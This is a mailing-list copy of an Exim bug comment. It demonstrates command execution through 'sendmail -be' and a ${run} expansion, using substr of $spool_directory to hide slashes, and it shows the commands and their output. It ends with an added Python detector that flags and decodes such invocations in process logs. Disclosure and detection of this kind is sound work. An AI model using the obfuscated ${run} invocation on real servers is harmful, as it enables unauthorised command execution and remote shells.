[exim-dev] [Bug 2118] sendmail -be and ${run} macro security…

Author: admin
Date:  
To: exim-dev
Subject: [exim-dev] [Bug 2118] sendmail -be and ${run} macro security problem
https://bugs.exim.org/show_bug.cgi?id=2118

--- Comment #2 from Sandor Takacs <taki@???> ---
If you run this as www-data you can create a remote shell to the attacked site
as the linked PoC says. I tried it in my FreeBSD box:

[root@??? ~]# ls -l /tmp/test
ls: /tmp/test: No such file or directory
[root@??? ~]# sudo -u www sendmail -be
'${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch
${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}'

[root@??? ~]# ls -l /tmp/test
-rw------- 1 www wheel 0 May 5 19:42 /tmp/test
[root@??? ~]#

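The invocation in the comment above can be caught in process-execution logs. The following is an added example (not from the bug report or the Exim project) that flags sendmail/exim runs using -be with a ${run} expansion and resolves the substr-of-$spool_directory fragments so the real command is readable. The spool path, the MTA binary names and the (user, command line) record format are assumptions.

```python
import re
import shlex

# Assumption: spool path of the monitored host. Exim's $spool_directory is an
# absolute path, so its first character is "/".
SPOOL_DIRECTORY = "/var/spool/exim"
MTA_NAMES = {"sendmail", "exim", "exim4"}  # assumed binary names
# ${substr{start}{length}{$spool_directory}} with literal numeric arguments
SUBSTR_SPOOL = re.compile(r"\$\{substr\{(\d+)\}\{(\d+)\}\{\$spool_directory\}\}")


def decode_substr(expr):
    """Resolve substr-of-$spool_directory fragments so the command is readable."""
    def repl(m):
        start, length = int(m.group(1)), int(m.group(2))
        return SPOOL_DIRECTORY[start:start + length]
    return SUBSTR_SPOOL.sub(repl, expr)


def inspect_exec(user, cmdline):
    """Return a finding for an MTA expansion test (-be) that uses ${run}, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the logged line
        argv = cmdline.split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in MTA_NAMES:
        return None
    if "-be" not in argv:
        return None
    exprs = [a for a in argv[argv.index("-be") + 1:] if "${run" in a]
    if not exprs:
        return None
    return {"user": user, "decoded": [decode_substr(e) for e in exprs]}


# Constructed sample records (user, command line); the first mirrors the
# command shown in the comment above.
SLASH = "${substr{0}{1}{$spool_directory}}"
SAMPLE_EVENTS = [
    ("www", "sendmail -be '${run{" + SLASH + "usr" + SLASH + "bin" + SLASH
            + "touch " + SLASH + "tmp" + SLASH + "test}}'"),
    ("www", "/usr/sbin/sendmail -t -i"),
    ("root", "exim -be '$spool_directory'"),
]

if __name__ == "__main__":
    for user, cmdline in SAMPLE_EVENTS:
        finding = inspect_exec(user, cmdline)
        if finding:
            print("ALERT user=%s ran %s" % (finding["user"], finding["decoded"]))
```

Matching on the ${run token rather than on a path is deliberate: the command in the comment contains no literal "/" until the substr fragments are resolved.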